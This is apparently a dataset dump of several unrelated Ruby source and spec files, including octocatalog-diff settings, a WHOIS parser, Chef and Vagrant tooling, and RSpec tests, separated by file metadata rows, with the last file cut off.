      ##############################################################################################
      # puppetdb_ssl_ca
      #   CA certificate (public cert) that signed the PuppetDB certificate. Provide this if you
      #   want octocatalog-diff to verify the PuppetDB certificate when it connects. You should be
      #   doing this. You can specify an absolute path starting with `/`, or a relative path.
      #   If you don't specify this, SSL will still work, but the tool won't verify the certificate
      #   of the puppetdb server it's connecting to.
      #   More: https://github.com/github/octocatalog-diff/blob/master/doc/configuration-puppetdb.md
      ##############################################################################################

      # settings[:puppetdb_ssl_ca] = '/etc/puppetlabs/puppet/ssl/certs/ca.pem'

      ##############################################################################################
      # puppetdb_ssl_client_key
      # puppetdb_ssl_client_password
      # puppetdb_ssl_client_cert
      # puppetdb_ssl_client_pem
      #
      #   This sets up SSL authentication for PuppetDB.
      #
      #   For SSL authentication, the key and certificate used for SSL client authentication.
      #   Don't set these if your PuppetDB is unauthenticated. The provided example may work if you
      #   run octocatalog-diff on a machine managed by Puppet, and your PuppetDB authenticates
      #   clients with that same CA. Otherwise, fill in the actual path to the key and the
      #   certificate in the relevant settings. If the key is password protected, set
      #   :puppetdb_ssl_client_password to the text of the password.
      #
      #   You can configure this in one of two ways:
      #     1. Set `puppetdb_ssl_client_key` and `puppetdb_ssl_client_cert` individually.
      #     2. Set `puppetdb_ssl_client_pem` to the concatenation of the key and the certificate.
      #
      #   VERY IMPORTANT: settings[:puppetdb_ssl_client_key], settings[:puppetdb_ssl_client_cert], and
      #   settings[:puppetdb_ssl_client_pem] need to be set to the TEXT OF THE CERTIFICATE/KEY, not
      #   just the file name of the certificate. You'll probably need to use something like this:
      #     settings[:puppetdb_ssl_client_WHATEVER] = File.read("...")
      #
      #   More: https://github.com/github/octocatalog-diff/blob/master/doc/configuration-puppetdb.md
      ##############################################################################################

      # require 'socket'
      # fqdn = Socket.gethostbyname(Socket.gethostname).first
      # settings[:puppetdb_ssl_client_key] = File.read("/etc/puppetlabs/puppet/ssl/private_keys/#{fqdn}.pem")
      # settings[:puppetdb_ssl_client_cert] = File.read("/etc/puppetlabs/puppet/ssl/certs/#{fqdn}.pem")

      # For keys generated by Puppet, passwords are not needed so the next setting can be left commented.
      # If you generated your own key outside of Puppet and it has a password, specify it here.
      # settings[:puppetdb_ssl_client_password] = 'your-password-here'

      ##############################################################################################
      # enc
      #   Path to the external node classifier. If the path starts with a `/`, then it is
      #   treated as an absolute path on this system. Otherwise, the path will be treated as
      #   a relative path. If you don't specify this, the tool will assume you aren't using an ENC.
      #   More: https://github.com/github/octocatalog-diff/blob/master/doc/configuration-enc.md
      ##############################################################################################

      # settings[:enc] = '/etc/puppetlabs/puppet/enc.sh' # Absolute path
      # settings[:enc] = 'environments/production/config/enc.sh' # Relative path

      ##############################################################################################
      # storeconfigs
      #   If you are using exported/collected resources from PuppetDB, you must enable the
      #   `storeconfigs` option. If you are not using exported/collected resources, then you
      #   need not enable this option. If you aren't sure if you're using storeconfigs or not,
      #   then type this on your Puppet master to find out:
      #     puppet config --section master print storeconfigs
      ##############################################################################################

      settings[:storeconfigs] = false

      ##############################################################################################
      # bootstrap_script
      #   When you check out your Puppet repository, do you need to run a script to prepare that
      #   repository for use? For example, maybe you need to run librarian-puppet to install
      #   modules. octocatalog-diff allows you to specify a script that will be run within the
      #   checked-out branch. If the path starts with a `/`, then it is treated as an absolute
      #   path on this system. Otherwise, the path will be treated as a relative path. If you don't
      #   specify this, the tool will assume you don't need a bootstrap script.
      ##############################################################################################

      # settings[:bootstrap_script] = '/etc/puppetlabs/repo-bootstrap.sh' # Absolute path
      # settings[:bootstrap_script] = 'script/bootstrap' # Relative path

      ##############################################################################################
      # pass_env_vars
      #   When a catalog is compiled, the compilation occurs in a clean environment. If you have
      #   environment variables that need to be passed through, e.g. with authentication tokens,
      #   specify them here. The return value must be an array.
      ##############################################################################################

      # settings[:pass_env_vars] = %w(AUTH_USERNAME AUTH_TOKEN)

      ##############################################################################################
      # puppet_binary
      #   This is the full path to the puppet binary on your system. If you don't specify this,
      #   the tool will just run 'puppet' and hope to find it in your path.
      ##############################################################################################

      # These are some common defaults. We recommend removing this and setting explicitly below.
      puppet_may_be_in = %w(
        bin/puppet
        /opt/puppetlabs/puppet/bin/puppet
        /usr/bin/puppet
        /usr/local/bin/puppet
      )
      # Use the first existing executable; leave the key unset when none is
      # found so the tool falls back to searching PATH.
      found_puppet = puppet_may_be_in.find { |path| File.executable?(path) }
      settings[:puppet_binary] = found_puppet if found_puppet

      # settings[:puppet_binary] = '/usr/bin/puppet'
      # settings[:puppet_binary] = '/opt/puppetlabs/puppet/bin/puppet'

      ##############################################################################################
      # from_env
      #   When working with branches, this is the default "from" environment to use. This should
      #   be set to the branch that is considered "stable" in your workflow. If you are using the
      #   GitHub flow, this is probably 'origin/master'.
      ##############################################################################################

      settings[:from_env] = 'origin/master'

      ##############################################################################################
      # Less commonly changed settings
      ##############################################################################################

      # Header: options are :default, or can optionally be set to a custom string you provide.
      # The default header is like: 'diff NODE_NAME/branch-old NODE_NAME/branch-new'.
      settings[:header] = :default

      # Cache the master branch and catalogs in home directory. This will speed up the second
      # and subsequent octocatalog-diff runs against the same node on the same branch. It's safe
      # to leave this enabled, but if you know that you never want to do caching on your system,
      # comment these lines out so the tool doesn't spend the time maintaining the cache.
      # NOTE(review): assumes ENV['HOME'] is set; File.join raises TypeError otherwise.
      settings[:cached_master_dir] = File.join(ENV['HOME'], '.octocatalog-diff-cache')
      settings[:safe_to_delete_cached_master_dir] = settings[:cached_master_dir]

      # This is the base directory of your Puppet checkout. Generally you are `cd` into the
      # directory when you run octocatalog-diff so this default will just work. However you
      # can hard-code this or get it from the environment if you need to.
      settings[:basedir] = Dir.pwd
      # settings[:basedir] = ENV['WORKSPACE'] # May work with Jenkins

      # This method must return the 'settings' hash.
      settings
    end
  end
end
03727c021a030af70267317a684f5c93aba0caa4 | 317 | #!/usr/bin/env ruby -wKU
# NOTE(review): despite the name this is a plain Array-backed collection —
# no balancing or ordering is performed; only the interface mimics a tree.
class AVLTree
  def initialize
    @contents = []
  end

  # True when no elements are stored.
  def empty?
    @contents.empty?
  end

  # True when +obj+ has been inserted and not yet removed.
  def include?(obj)
    @contents.include?(obj)
  end

  # Inserts +obj+ and returns self so inserts can be chained, instead of
  # leaking the internal storage array as the original did.
  def <<(obj)
    @contents << obj
    self
  end

  # Height of an ideally balanced tree holding this many elements.
  # Fix: guard the empty case — Math.log(0) is -Infinity and calling #ceil
  # on it raises FloatDomainError.
  def height
    return 0 if @contents.empty?
    Math.log(@contents.length).ceil
  end

  # Removes all elements equal to +obj+ (Array#delete semantics); returns
  # the deleted value, or nil when nothing matched.
  def remove(obj)
    @contents.delete(obj)
  end
end
| 10.566667 | 35 | 0.637224 |
9138e6a1e98ca7ad8536a4a19bbf9003549fd811 | 340 | require 'spec_helper'
describe "wrap request parameters", type: :request do
  describe "json format" do
    it 'should not add a root node to the controller parameters' do
      # Rails params-wrapping must stay disabled for Devise controllers: a
      # JSON request must not get its params wrapped under :registration.
      get "/users/sign_up", nil, { "CONTENT_TYPE" => "application/json; charset=utf-8" }
      expect(request.params).not_to include(:registration)
    end
  end
end
| 28.333333 | 88 | 0.702941 |
26f2cca2dbf98a1e641ff63b4e8f2373be43d791 | 3,235 | #--
# Ruby Whois
#
# An intelligent pure Ruby WHOIS client and parser.
#
# Copyright (c) 2009-2018 Simone Carletti <[email protected]>
#++
require_relative 'base'
require 'whois/scanners/base_shared2'
module Whois
  class Parsers

    # Shared parser 2.
    #
    # @abstract
    class BaseShared2 < Base
      include Scanners::Scannable

      self.scanner = Scanners::BaseShared2


      # Actually the :disclaimer is supported,
      # but extracting it with the current scanner
      # would require too much effort.
      # property_supported :disclaimer


      property_supported :domain do
        node("Domain Name", &:downcase)
      end

      property_supported :domain_id do
        node("Domain ID")
      end


      property_supported :status do
        node("Domain Status") { |value| Array.wrap(value) }
      end

      property_supported :available? do
        !!node("status:available")
      end

      property_supported :registered? do
        !available?
      end


      property_supported :created_on do
        node("Domain Registration Date") { |value| parse_time(value) }
      end

      property_supported :updated_on do
        node("Domain Last Updated Date") { |value| parse_time(value) }
      end

      property_supported :expires_on do
        node("Domain Expiration Date") { |value| parse_time(value) }
      end


      property_supported :registrar do
        # The block receives the node's value; use it directly instead of
        # re-querying the node (the original ignored the block parameter).
        node("Registrar") do |name|
          Parser::Registrar.new(
              :id   => node("Registrar IANA ID"),
              :name => name
          )
        end
      end

      property_supported :registrant_contacts do
        build_contact("Registrant", Parser::Contact::TYPE_REGISTRANT)
      end

      property_supported :admin_contacts do
        build_contact("Administrative Contact", Parser::Contact::TYPE_ADMINISTRATIVE)
      end

      property_supported :technical_contacts do
        build_contact("Technical Contact", Parser::Contact::TYPE_TECHNICAL)
      end


      property_supported :nameservers do
        Array.wrap(node("Name Server")).map do |name|
          Parser::Nameserver.new(:name => name.downcase)
        end
      end


      private

      # Builds a Parser::Contact of the given +type+ from the "#{element} *"
      # nodes, or nil when the "#{element} ID" node is absent.
      def build_contact(element, type)
        node("#{element} ID") do |id|
          # Join the up-to-three address lines, skipping missing ones
          # (compact replaces the original delete_if(&:nil?)).
          address = (1..3).
              map { |i| node("#{element} Address#{i}") }.
              compact.
              join("\n")

          Parser::Contact.new(
              :type         => type,
              :id           => id,
              :name         => node("#{element} Name"),
              :organization => node("#{element} Organization"),
              :address      => address,
              :city         => node("#{element} City"),
              :zip          => node("#{element} Postal Code"),
              :state        => node("#{element} State/Province"),
              :country      => node("#{element} Country"),
              :country_code => node("#{element} Country Code"),
              :phone        => node("#{element} Phone Number"),
              :fax          => node("#{element} Facsimile Number"),
              :email        => node("#{element} Email")
          )
        end
      end

    end

  end
end
| 25.273438 | 85 | 0.559815 |
e86ce906b1da103eee4499071f527a60c6da7a7b | 39 | module Rainbow
VERSION = "0.1.0"
end
| 9.75 | 19 | 0.666667 |
03be3649a8a608093f72ce2a95923975d4f1e9b4 | 970 | #
# Author:: Matt Eldridge (<[email protected]>)
# © Copyright IBM Corporation 2014.
#
# LICENSE: Apache 2.0 (http://www.apache.org/licenses/)
#
require 'chef/knife/softlayer_base'
class Chef
class Knife
class SoftlayerVlanCreate < Knife
include Knife::SoftlayerBase
banner 'knife softlayer vlan create'
def run
$stdout.sync = true
opts = {
:name => ui.ask_question("Enter a vlan name: "),
:datacenter => connection(:network).datacenters.by_name(ui.ask_question("Enter a datacenter name: ")),
:router => {'hostname' => ui.ask_question("Enter a router hostname: ")},
:network_space => ui.ask_question("Enter a network space: ", :default => 'PUBLIC'),
}
vlan = connection(:network).networks.create(opts)
!!vlan and puts "#{ui.color("VLAN successfully created. Provisioning may take a few minutes to complete.", :green)}"
end
end
end
end
| 25.526316 | 125 | 0.634021 |
e2f7529842a10b9a7a2e062ba2e1acf6f7455f42 | 1,151 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v4/enums/frequency_cap_time_unit.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v4/enums/frequency_cap_time_unit.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v4.enums.FrequencyCapTimeUnitEnum" do
end
add_enum "google.ads.googleads.v4.enums.FrequencyCapTimeUnitEnum.FrequencyCapTimeUnit" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :DAY, 2
value :WEEK, 3
value :MONTH, 4
end
end
end
module Google
module Ads
module GoogleAds
module V4
module Enums
FrequencyCapTimeUnitEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v4.enums.FrequencyCapTimeUnitEnum").msgclass
FrequencyCapTimeUnitEnum::FrequencyCapTimeUnit = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v4.enums.FrequencyCapTimeUnitEnum.FrequencyCapTimeUnit").enummodule
end
end
end
end
end
| 34.878788 | 205 | 0.748914 |
b978b5fef539193d1ec82942f7456b0d560f3ad4 | 6,961 | #!/usr/bin/env ruby
require 'json'
require 'optparse'
BIN_DIR = "#{File.dirname(__FILE__)}/bin"
DMG_DIR = "#{File.dirname(__FILE__)}/dmg"
BOX_DIR = "#{File.dirname(__FILE__)}/box"
def log_info(msg)
STDERR.puts "\033[0;32m-- #{msg}\033[0m"
end
def log_error(msg)
STDERR.puts "\033[0;31m-- #{msg}\033[0m"
end
def bail(msg)
log_error msg
exit 1
end
def run_command(cmd)
system(cmd) || bail("Non-zero exit code: #{cmd}")
end
def box_added?(name)
system(%Q( vagrant box list | cut -d" " -f1 | grep -q "^#{name}$" ))
$?.exitstatus == 0
end
def image_specified?
$options[:image_path]
end
def image_exists?
$options[:image_path] && File.exists?($options[:image_path])
end
def base_box_exists?
$options[:base_box_path] && File.exists?($options[:base_box_path])
end
def base_box_added?
$options[:base_box_name] && box_added?($options[:base_box_name])
end
def flavor_specified?
$options[:flavor_name]
end
def flavor_box_exists?
$options[:flavor_box_path] && File.exists?($options[:flavor_box_path])
end
def flavor_box_added?
$options[:flavor_box_name] && box_added?($options[:flavor_box_name])
end
def get_latest_supported_installer_path
installer_path = "/Applications/Install macOS Sierra.app"
if File.exist?(installer_path)
begin
install_info_json = IO.popen(["plutil", "-convert", "json", "#{installer_path}/Contents/SharedSupport/InstallInfo.plist", "-o", "-"]).read
install_info = JSON.parse install_info_json
product_version = install_info["System Image Info"]["version"].split(".")
product_version_minor = product_version[2].to_i
return installer_path if product_version_minor < 4
rescue
end
end
installer_paths = ["/Applications/Install OS X El Capitan.app", "/Applications/Install OS X Yosemite.app"]
while installer_path = installer_paths.shift
return installer_path if File.exists?(installer_path)
end
return nil
end
$options = {}
OptionParser.new do |o|
o.on('--installer-path PATH', 'Path to the input installer app.') { |path| $options[:installer_path] = path }
o.on('--image-path PATH', 'Path to the input/output image.') { |path| $options[:image_path] = path }
o.on('--base-box-name NAME', 'Name of the input/output box.') { |name| $options[:base_box_name] = name }
o.on('--base-box-path PATH', 'Path to the input/output box.') { |path| $options[:base_box_path] = path }
o.on('--flavor-name NAME', 'Name of the flavor.') { |name| $options[:flavor_name] = name }
o.on('--flavor-box-name NAME', 'Name of output flavor box.') { |name| $options[:flavor_box_name] = name }
o.on('--flavor-box-path PATH', 'Path to output flavor box.') { |path| $options[:flavor_box_path] = path }
o.on('-h', '--help') { puts o; exit }
o.parse!
end
$actions = {}
loop do
if flavor_specified?
break if flavor_box_added?
$actions[:add_flavor_box] = true
break if flavor_box_exists?
$actions[:create_flavor_box] = true
end
break if base_box_added?
$actions[:add_base_box] = true
break if base_box_exists?
$actions[:create_base_box] = true
break if image_exists?
$actions[:create_image] = true
break if image_specified?
$actions[:get_version] = true
break
end
run_with_root_privileges = "sudo"
run_without_root_privileges = ""
if Process.uid == 0 && ENV["SUDO_USER"]
run_with_root_privileges = ""
run_without_root_privileges = "sudo -u \"#{ENV["SUDO_USER"]}\""
end
if $actions[:get_version] || $actions[:create_image]
unless $options[:installer_path]
$options[:installer_path] = get_latest_supported_installer_path
log_info "Found installer app: #{File.basename $options[:installer_path]}"
end
if !$options[:installer_path] || !File.exists?($options[:installer_path])
bail "Installer app not found."
end
end
if $actions[:create_base_box]
if $options[:image_path]
unless File.exists? $options[:image_path]
bail "Image not found."
end
$options[:base_box_name] ||= File.basename($options[:image_path], ".dmg")
end
end
if $options[:flavor_name]
$options[:flavor_path] = "#{File.dirname(__FILE__)}/flavor/#{$options[:flavor_name]}"
unless File.exists? $options[:flavor_path]
bail "Flavor not found."
end
end
if $actions[:get_version]
log_info "Getting OS version from installer app..."
installer_version = %x( #{run_with_root_privileges} "#{BIN_DIR}/get_installer_version.sh" "#{$options[:installer_path]}" ).chomp
if installer_version.length == 0
bail "Could not read the OS version from the installer app."
end
$options[:image_path] ||= "#{DMG_DIR}/macos#{installer_version}.dmg"
$options[:base_box_name] ||= "macos#{installer_version}"
log_info "Found OS version '#{installer_version}'."
end
if $actions[:create_image] || $actions[:create_base_box]
bail("Image path not specified.") unless image_specified?
end
if $actions[:create_image]
unless image_exists?
log_info "Creating autoinstall image..."
run_command(%Q( #{run_with_root_privileges} "#{BIN_DIR}/create_autoinstall_image.sh" "#{$options[:installer_path]}" "#{$options[:image_path]}" ))
log_info "Created autoinstall image."
end
end
if $actions[:create_base_box] || $actions[:create_flavor_box]
bail("Base box name not specified.") if !$options[:base_box_name]
$options[:base_box_path] ||= "#{BOX_DIR}/#{$options[:base_box_name]}.box"
end
if $actions[:create_base_box]
unless base_box_exists?
log_info "Creating base box..."
run_command(%Q( #{run_without_root_privileges} "#{BIN_DIR}/create_base_box.sh" "#{$options[:image_path]}" "#{$options[:base_box_path]}" "#{$options[:base_box_name]}" ))
log_info "Created base box."
end
end
if $actions[:add_base_box]
unless base_box_added?
log_info "Adding base box..."
run_command(%Q( #{run_without_root_privileges} vagrant box add "#{$options[:base_box_path]}" --name "#{$options[:base_box_name]}" ))
log_info "Added base box."
end
end
def generate_flavor_box_name(name, flavor)
((name.match(/-/) ? name.split('-')[0..-2] : [name] ) + [flavor]).join('-')
end
if $actions[:create_flavor_box]
$options[:flavor_box_name] ||= generate_flavor_box_name($options[:base_box_name], $options[:flavor_name]) if $options[:base_box_name]
bail("Flavor box name not specified.") if !$options[:flavor_box_name]
$options[:flavor_box_path] ||= "#{BOX_DIR}/#{$options[:flavor_box_name]}.box"
unless flavor_box_exists?
log_info "Creating flavor box..."
run_command(%Q( #{run_without_root_privileges} "#{BIN_DIR}/create_flavor_box.sh" "#{$options[:base_box_name]}" "#{$options[:flavor_path]}" "#{$options[:flavor_box_path]}" "#{$options[:flavor_box_name]}" ))
log_info "Created flavor box."
end
end
if $actions[:add_flavor_box]
unless flavor_box_added?
log_info "Adding flavor box..."
run_command(%Q( #{run_without_root_privileges} vagrant box add "#{$options[:flavor_box_path]}" --name "#{$options[:flavor_box_name]}" ))
log_info "Added flavor box."
end
end
| 32.680751 | 209 | 0.702773 |
ab6f6437efb6150d786ee6835950ba29dc05abe4 | 6,643 | # Chef Provider for configuring an elasticsearch instance
class ElasticsearchCookbook::ConfigureProvider < Chef::Provider::LWRPBase
include ElasticsearchCookbook::Helpers
provides :elasticsearch_configure
def whyrun_supported?
true # we only use core Chef resources that also support whyrun
end
action :manage do
# lookup existing ES resources
es_user = find_es_resource(Chef.run_context, :elasticsearch_user, new_resource)
es_svc = find_es_resource(Chef.run_context, :elasticsearch_service, new_resource)
es_install = find_es_resource(Chef.run_context, :elasticsearch_install, new_resource)
default_configuration = new_resource.default_configuration.dup
# if a subdir parameter is missing but dir is set, infer the subdir name
# then go and be sure it's also set in the YML hash if it wasn't given there
if new_resource.path_data && default_configuration['path.data'].nil?
default_configuration['path.data'] = new_resource.path_data
end
if new_resource.path_logs && default_configuration['path.logs'].nil?
default_configuration['path.logs'] = new_resource.path_logs
end
# calculation for memory allocation; 50% or 31g, whatever is smaller
unless new_resource.allocated_memory
half = ((node['memory']['total'].to_i * 0.5).floor / 1024)
malloc_str = (half > 30_500 ? '30500m' : "#{half}m")
new_resource.allocated_memory malloc_str
end
# Create ES directories
#
[new_resource.path_conf, "#{new_resource.path_conf}/scripts"].each do |path|
d = directory path do
owner es_user.username
group es_user.groupname
mode '0750'
recursive true
action :nothing
end
d.run_action(:create)
new_resource.updated_by_last_action(true) if d.updated_by_last_action?
end
# Create data path directories
#
data_paths = new_resource.path_data.is_a?(Array) ? new_resource.path_data : new_resource.path_data.split(',')
data_paths = data_paths << new_resource.path_logs
data_paths.each do |path|
d = directory path.strip do
owner es_user.username
group es_user.groupname
mode '0755'
recursive true
action :nothing
end
d.run_action(:create)
new_resource.updated_by_last_action(true) if d.updated_by_last_action?
end
# Create elasticsearch shell variables file
#
# Valid values in /etc/sysconfig/elasticsearch or /etc/default/elasticsearch
# ES_HOME JAVA_HOME ES_PATH_CONF DATA_DIR LOG_DIR PID_DIR ES_JAVA_OPTS
# RESTART_ON_UPGRADE ES_USER ES_GROUP ES_STARTUP_SLEEP_TIME MAX_OPEN_FILES
# MAX_LOCKED_MEMORY MAX_MAP_COUNT
#
# We provide these values as resource attributes/parameters directly
params = {}
params[:ES_HOME] = new_resource.path_home
params[:JAVA_HOME] = new_resource.java_home
params[:ES_PATH_CONF] = new_resource.path_conf
params[:DATA_DIR] = new_resource.path_data
params[:LOG_DIR] = new_resource.path_logs
params[:PID_DIR] = new_resource.path_pid
params[:RESTART_ON_UPGRADE] = new_resource.restart_on_upgrade
params[:ES_USER] = es_user.username if es_install.type == 'tarball'
params[:ES_GROUP] = es_user.groupname if es_install.type == 'tarball'
params[:ES_STARTUP_SLEEP_TIME] = new_resource.startup_sleep_seconds.to_s
params[:MAX_OPEN_FILES] = new_resource.nofile_limit
params[:MAX_LOCKED_MEMORY] = new_resource.memlock_limit
params[:MAX_MAP_COUNT] = new_resource.max_map_count
default_config_name = es_svc.service_name || es_svc.instance_name || new_resource.instance_name || 'elasticsearch'
shell_template = template "elasticsearch.in.sh-#{default_config_name}" do
path %w[rhel amazon].include?(node['platform_family']) ? "/etc/sysconfig/#{default_config_name}" : "/etc/default/#{default_config_name}"
source new_resource.template_elasticsearch_env
cookbook new_resource.cookbook_elasticsearch_env
mode '0644'
variables(params: params)
action :nothing
end
shell_template.run_action(:create)
new_resource.updated_by_last_action(true) if shell_template.updated_by_last_action?
# Create jvm.options file
#
jvm_options_template = template "jvm_options-#{default_config_name}" do
path "#{new_resource.path_conf}/jvm.options"
source new_resource.template_jvm_options
cookbook new_resource.cookbook_jvm_options
owner es_user.username
group es_user.groupname
mode '0644'
variables(jvm_options: [
"-Xms#{new_resource.allocated_memory}",
"-Xmx#{new_resource.allocated_memory}",
new_resource.jvm_options,
].flatten.join("\n"))
action :nothing
end
jvm_options_template.run_action(:create)
new_resource.updated_by_last_action(true) if jvm_options_template.updated_by_last_action?
# Create ES logging file
#
logging_template = template "log4j2_properties-#{default_config_name}" do
path "#{new_resource.path_conf}/log4j2.properties"
source new_resource.template_log4j2_properties
cookbook new_resource.cookbook_log4j2_properties
owner es_user.username
group es_user.groupname
mode '0640'
variables(logging: new_resource.logging)
action :nothing
end
logging_template.run_action(:create)
new_resource.updated_by_last_action(true) if logging_template.updated_by_last_action?
# Create ES elasticsearch.yml file
#
merged_configuration = default_configuration.merge(new_resource.configuration.dup)
# warn if someone is using symbols. we don't support.
found_symbols = merged_configuration.keys.select { |s| s.is_a?(Symbol) }
unless found_symbols.empty?
Chef::Log.warn("Please change the following to strings in order to work with this Elasticsearch cookbook: #{found_symbols.join(',')}")
end
# workaround for https://github.com/elastic/cookbook-elasticsearch/issues/590
config_vars = ElasticsearchCookbook::HashAndMashBlender.new(merged_configuration).to_hash
yml_template = template "elasticsearch.yml-#{default_config_name}" do
path "#{new_resource.path_conf}/elasticsearch.yml"
source new_resource.template_elasticsearch_yml
cookbook new_resource.cookbook_elasticsearch_yml
owner es_user.username
group es_user.groupname
mode '0640'
helpers(ElasticsearchCookbook::Helpers)
variables(config: config_vars)
action :nothing
end
yml_template.run_action(:create)
new_resource.updated_by_last_action(true) if yml_template.updated_by_last_action?
end
end
| 40.260606 | 142 | 0.735812 |
b97aeb435b97b84433c46f8a1221e65f122c23b1 | 1,959 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe BulkImports::Groups::Pipelines::EntityFinisher do
it 'updates the entity status to finished' do
entity = create(:bulk_import_entity, :started)
pipeline_tracker = create(:bulk_import_tracker, entity: entity)
context = BulkImports::Pipeline::Context.new(pipeline_tracker)
subject = described_class.new(context)
expect_next_instance_of(Gitlab::Import::Logger) do |logger|
expect(logger)
.to receive(:info)
.with(
bulk_import_id: entity.bulk_import.id,
bulk_import_entity_id: entity.id,
bulk_import_entity_type: entity.source_type,
pipeline_class: described_class.name,
message: 'Entity finished'
)
end
expect { subject.run }
.to change(entity, :status_name).to(:finished)
end
context 'when entity is in a final finished or failed state' do
shared_examples 'performs no state update' do |entity_state|
it 'does nothing' do
entity = create(:bulk_import_entity, entity_state)
pipeline_tracker = create(:bulk_import_tracker, entity: entity)
context = BulkImports::Pipeline::Context.new(pipeline_tracker)
subject = described_class.new(context)
expect { subject.run }
.not_to change(entity, :status_name)
end
end
include_examples 'performs no state update', :finished
include_examples 'performs no state update', :failed
end
context 'when all entity trackers failed' do
it 'marks entity as failed' do
entity = create(:bulk_import_entity, :started)
create(:bulk_import_tracker, :failed, entity: entity)
pipeline_tracker = create(:bulk_import_tracker, entity: entity, relation: described_class)
context = BulkImports::Pipeline::Context.new(pipeline_tracker)
described_class.new(context).run
expect(entity.reload.failed?).to eq(true)
end
end
end
| 33.775862 | 96 | 0.699847 |
117e9cbeb1a1d50bf3459ad4dd861b8814764d0a | 368 | # frozen_string_literal: true
module Creators
class CollectionCreator
attr_accessor :collection
def initialize(user:, form:)
@user = user
@form = form
end
def call
@collection = @user.collections.new(
name: @form.name,
description: @form.description
)
@collection.save!
self
end
end
end
| 15.333333 | 42 | 0.608696 |
1c12b145cac846460aca68193d6170451181fb50 | 1,467 | require 'rails_helper'
# IMPORTANT: Add spec/support/tasks.rb to your project to load rake tasks.
RSpec.describe "Subscription tasks", :type => :task do
context "subscription:confirmation_overdue:delete" do
before do
# Freeze time as task is time-sensitive
travel_to Time.now
end
after { travel_back }
it "leaves unconfirmed subscriptions of age 3 days or younger" do
not_overdue = create_list(:subscription, 2, confirmed: false, created_at: 3.days.ago)
expect { invoke_task }.not_to change { Subscription.count }
end
it "deletes unconfirmed subscriptions of age more than 3 days" do
overdue = create_list(:subscription, 2, confirmed: false, created_at: (3.days + 1.second).ago)
expect { invoke_task }.to change { Subscription.count }.from(2).to(0)
end
it "ends gracefully when no subscriptions exist" do
expect { invoke_task }.not_to raise_error
end
it "leaves confirmed subscriptions alone" do
confirmed = create(:subscription, confirmed: true, created_at: 1.year.ago)
expect { invoke_task }.not_to change { Subscription.count }
end
private
def invoke_task
task = Rake::Task["subscription:confirmation_overdue:delete"]
# Ensure task is re-enabled, as rake tasks by default are disabled
# after running once within a process http://pivotallabs.com/how-i-test-rake-tasks/
task.reenable
task.invoke
end
end
end
| 30.5625 | 100 | 0.698705 |
39d0fa8f37c0e319abc655c71709302a7beef127 | 750 | # frozen_string_literal: true
require 'rdown/version'
module Rdown
autoload :Errors, 'rdown/errors'
autoload :Nodes, 'rdown/nodes'
autoload :Parser, 'rdown/parser'
autoload :Position, 'rdown/position'
autoload :PositionDelta, 'rdown/position_delta'
autoload :PreProcessor, 'rdown/pre_processor'
autoload :Serializable, 'rdown/serializable'
autoload :SourceMap, 'rdown/source_map'
autoload :Tokenizer, 'rdown/tokenizer'
autoload :Tokens, 'rdown/tokens'
class << self
# @param [String]
# @return [Rdown::Nodes::Base]
def parse(source)
pre_processed_source = ::Rdown::PreProcessor.call(source)
tokens = ::Rdown::Tokenizer.call(**pre_processed_source)
::Rdown::Parser.call(tokens)
end
end
end
| 27.777778 | 63 | 0.713333 |
b9ff9e77db80d3954379a11db95a715bb9cc4b5c | 232 | class AddCommentToPostComments < ActiveRecord::Migration[5.2]
def change
add_column :post_comments, :user_id, :integer
add_column :post_comments, :post_id, :integer
add_column :post_comments, :comment, :text
end
end
| 29 | 61 | 0.75431 |
ffd1b3e8a795e339925dd703c3170c63b5ee2376 | 909 | # coding: utf-8
module ONIX
class OtherText
include Virtus.model
attribute :text_type_code, Integer
attribute :text_format
attribute :text
attribute :text_link_type,Integer
attribute :text_link
attribute :text_author
def to_xml
OtherTextRepresenter.new(self).to_xml
end
def self.from_xml(data)
OtherTextRepresenter.new(self.new).from_xml(data)
end
end
class OtherTextRepresenter < Representable::Decorator
include Representable::XML
self.representation_wrap = :OtherText
property :text_type_code, as: "TextTypeCode", render_filter: ::ONIX::Formatters::TWO_DIGITS
property :text_format, as: "TextFormat"
property :text, as: "Text"
property :text_link_type, as: "TextLinkType", render_filter: ::ONIX::Formatters::TWO_DIGITS
property :text_link, as: "TextLink"
property :text_author, as: "TextAuthor"
end
end
| 25.25 | 95 | 0.721672 |
bbe938122eaecec9c294948bddbfaa7a20761ac9 | 383 | class CreateQualifyings < ActiveRecord::Migration[6.0]
def change
create_table :qualifyings do |t|
t.bigint :race_id, null: false
t.bigint :driver_id, null: false
t.bigint :constructor_id, null: false
t.integer :number, null: false
t.integer :position
t.string :q1
t.string :q2
t.string :q3
t.timestamps
end
end
end
| 22.529412 | 54 | 0.637076 |
87bb83524b3bb8180393a6d43c6b17337f6e0079 | 6,532 | # encoding: UTF-8
require 'spec_helper'
RSpec.describe Measurement do
describe 'kiloliters' do
subject { described_class.parse('1 kl') }
it 'converts to hectoliters' do
expect(subject.convert_to(:hl).quantity).to eq 10
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'hectoliters' do
subject { described_class.parse('10 hl') }
it 'converts to kiloliters' do
expect(subject.convert_to(:kl).quantity).to eq 1
end
it 'converts to dekaliters' do
expect(subject.convert_to(:dal).quantity).to eq 100
end
it 'converts to liters' do
expect(subject.convert_to(:l).quantity).to eq 1_000
end
it 'converts to deciliters' do
expect(subject.convert_to(:dl).quantity).to eq 10_000
end
it 'converts to centiliters' do
expect(subject.convert_to(:cl).quantity).to eq 100_000
end
it 'converts to milliliters' do
expect(subject.convert_to(:ml).quantity).to eq 1_000_000
end
it 'converts to microliters' do
expect(subject.convert_to(:µl).quantity).to eq 10_000_000
end
end
describe 'dekaliters' do
